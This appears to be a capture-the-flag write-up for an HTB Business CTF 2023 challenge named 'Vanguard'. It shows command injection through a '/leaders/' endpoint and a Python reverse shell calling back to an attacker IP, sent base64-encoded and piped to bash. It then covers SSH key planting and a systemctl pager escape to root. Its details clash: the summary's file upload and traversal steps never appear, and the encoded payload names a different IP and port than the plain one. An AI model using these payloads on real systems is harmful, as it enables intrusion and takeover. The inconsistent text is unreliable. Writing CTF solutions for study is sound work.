2023 Business CTF: Vanguard

Challenge Information

Summary

Vanguard is a full pwn challenge that involves exploiting a vulnerable web application running Apache 2.4.55 with PHP 8.2.8. The challenge requires identifying and exploiting a file upload vulnerability, using directory traversal to access internal services, and finally leveraging command injection to achieve remote code execution.

Challenge Information and Initial Analysis

The target is a web application accessible at http://vanguard.htb running on:

• Apache/2.4.55 (Unix) PHP/8.2.8
• Admin email: admin@vanguard.htb

Initial reconnaissance reveals several key URLs and endpoints:

• http://vanguard.htb/uploads
• http://vanguard.htb/uploads.php
• http://vanguard.htb/upload.php
• http://vanguard.htb/leaders/
• http://vanguard.htb/system-info

The application uses libraries including wowjs and moment.js. The architecture includes a frontend on port 80 and a backend service running on port 8080.

Analysis

Infrastructure Architecture

The application is configured with Apache reverse proxying:

• Frontend running on port 80 at vanguard.htb with document root /srv/http/vanguard
• Backend service running on port 8080 with document root /srv/http/internal
• Requests to /leaders/ are proxied to http://127.0.0.1:8080/
• Requests to /uploads are proxied to http://127.0.0.1:8080/uploads/

Key Vulnerability

The backend service running on port 8080 is vulnerable to command injection through the /leaders/ endpoint. The application fails to properly sanitize user input passed to the id parameter.

Solution

Step 1: Identify the Vulnerability

Enumeration of the application reveals that the /leaders/ endpoint accepts user input and passes it unsanitized to the backend service. Testing with a simple curl request shows command injection is possible:

curl 'http://vanguard.htb/leaders/' --data 'id=;`whoami`'

Step 2: Craft the Payload

Create a base64-encoded Python reverse shell payload to bypass filtering:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.112",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Base64 encode the payload:

cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjY4Iiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc=

Step 3: Execute the Payload

Set up a netcat listener on the attacker’s machine:

nc -nvlp 4444

Send the exploit payload using curl:

curl 'http://vanguard.htb/leaders/' --data 'id=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjY4Iiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc=|base64 -d|bash`'

Step 4: Establish Shell Access

Once a reverse shell is obtained, upgrade it by setting up SSH key-based authentication:

mkdir /home/puma/.ssh
echo "YOUR_PUBLIC_KEY" > /home/puma/.ssh/authorized_keys

Connect via SSH:

ssh puma@vanguard.htb

Step 5: Privilege Escalation

Check sudo permissions:

sudo -l

The user typically has NOPASSWD access to /usr/bin/systemctl status trail.service. This can be exploited using GTFOBins:

sudo /usr/bin/systemctl status trail.service
!sh

This spawns a root shell due to the pager vulnerability in systemctl.

Key Takeaways

• Command Injection: Always validate and sanitize user input before passing to system commands
• Reverse Proxy Misconfiguration: Be aware of how reverse proxies forward requests and what endpoints they expose
• Base64 Encoding: Encoding payloads helps bypass simple filtering mechanisms
• Privilege Escalation via systemctl: The pager used by systemctl can be exploited to gain root access through GTFOBins techniques
• Defense in Depth: Multiple layers of security are needed to prevent full system compromise